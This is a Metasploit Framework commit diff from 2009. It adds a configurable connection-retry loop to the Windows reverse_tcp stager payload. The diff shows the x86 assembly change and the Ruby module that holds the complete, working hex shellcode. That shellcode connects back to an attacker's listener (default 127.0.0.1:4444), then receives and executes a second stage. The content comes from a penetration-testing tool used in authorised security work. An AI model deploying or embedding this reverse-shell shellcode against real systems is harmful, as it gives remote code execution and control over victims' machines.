Fixes #342. Set ReverseConnectRetries to a value between 1 and 255 (default is 5). On failure it will ExitProcess (still better than a cpu spin)

git-svn-id: file:///home/svn/framework3/trunk@7217 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2009-10-20 20:31:14 +00:00
parent 4b64e01596
commit 00b2915554
4 changed files with 39 additions and 13 deletions

View File

@ -7,11 +7,11 @@ require 'rex'
require 'rex/post/meterpreter' require 'rex/post/meterpreter'
ip = ARGV[0] ip = ARGV.shift() || exit
port = ARGV[1] port = ARGV.shift() || 31337
if (ip == nil || port == nil) if (ip == nil || port == nil)
puts "Syntax: test.rb <ip> <port>\n" puts "Syntax: test.rb <ip> [port]\n"
exit exit
end end

View File

@ -34,12 +34,29 @@ reverse_tcp:
push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" ) push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
xchg edi, eax ; save the socket for later, don't care about the value of eax after this xchg edi, eax ; save the socket for later, don't care about the value of eax after this
set_address:
push byte 0x05 ; retry counter
push 0x0100007F ; host 127.0.0.1 push 0x0100007F ; host 127.0.0.1
push 0x5C110002 ; family AF_INET and port 4444 push 0x5C110002 ; family AF_INET and port 4444
mov esi, esp ; save pointer to sockaddr struct mov esi, esp ; save pointer to sockaddr struct
try_connect:
push byte 16 ; length of the sockaddr struct push byte 16 ; length of the sockaddr struct
push esi ; pointer to the sockaddr struct push esi ; pointer to the sockaddr struct
push edi ; the socket push edi ; the socket
push 0x6174A599 ; hash( "ws2_32.dll", "connect" ) push 0x6174A599 ; hash( "ws2_32.dll", "connect" )
call ebp ; connect( s, &sockaddr, 16 ); call ebp ; connect( s, &sockaddr, 16 );
test eax,eax ; non-zero means a failure
jz short connected
handle_failure:
dec dword [esi+8]
jnz short try_connect
failure:
push 0x56A2B5F0 ; hardcoded to exitprocess for size
call ebp
connected:

View File

@ -44,6 +44,13 @@ module ReverseTcp
Opt::LPORT(4444) Opt::LPORT(4444)
], Msf::Handler::ReverseTcp) ], Msf::Handler::ReverseTcp)
# XXX: Not supported by all modules
register_advanced_options(
[
OptInt.new('ReverseConnectRetries', [ true, 'The number of connection attempts to try before exiting the process', 5 ])
], Msf::Handler::ReverseTcp)
self.conn_threads = [] self.conn_threads = []
end end

View File

@ -33,9 +33,9 @@ module Metasploit3
'Stager' => 'Stager' =>
{ {
'RequiresMidstager' => false, 'RequiresMidstager' => false,
'Offsets' => { 'LHOST' => [ 195, 'ADDR' ], 'LPORT' => [ 202, 'n' ], }, 'Offsets' => { 'LHOST' => [ 197, 'ADDR' ], 'LPORT' => [ 204, 'n' ], 'ReverseConnectRetries' => [ 195, 'C'] },
'Payload' => 'Payload' =>
# Length: 272 bytes # Length: 290 bytes
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
@ -48,15 +48,17 @@ module Metasploit3
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" + "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" + "\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" + "\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
"\xD5\x97\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10" + "\xD5\x97\x6A\x05\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6" +
"\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68" + "\x6A\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF" +
"\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00\x56" + "\x4E\x08\x75\xEC\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56" +
"\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56\x53\x57" + "\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00" +
"\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3" "\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56" +
"\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75" +
"\xEC\xC3"
} }
)) ))
end end
end end